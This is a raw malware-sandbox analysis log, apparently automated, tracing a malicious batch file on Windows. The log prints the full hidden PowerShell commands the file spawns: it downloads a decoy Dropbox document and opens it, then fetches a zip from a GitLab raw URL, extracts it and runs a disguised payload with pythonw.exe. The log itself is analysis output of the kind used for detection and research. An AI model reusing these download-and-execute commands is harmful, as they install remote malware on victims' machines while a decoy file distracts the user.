              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
              Source: powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
              Source: powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B2AFA12_2_00007FFD348B2AFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B42FA12_2_00007FFD348B42FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B273512_2_00007FFD348B2735
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B632112_2_00007FFD348B6321
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B35F212_2_00007FFD348B35F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD348B100512_2_00007FFD348B1005
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348B46F214_2_00007FFD348B46F2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348B63F814_2_00007FFD348B63F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD348B25FD14_2_00007FFD348B25FD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C34FA16_2_00007FFD348C34FA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C38D516_2_00007FFD348C38D5
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C5FF816_2_00007FFD348C5FF8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD348C261D16_2_00007FFD348C261D
              Source: classification engineClassification label: mal96.troj.evad.winBAT@30/16@3/2
              Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rurk3zrg.q1o.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hnl2bose13.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fINd
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\hnl2bose13.bat"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fINdJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_Advertising_Campaign_and_Collaboration.docx?rlkey=fsqq79ia4xbo8dqyozgq8q2oj&st=vf0kbpju&dl=1', 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\12_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosse21/mkt/-/raw/main/12Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
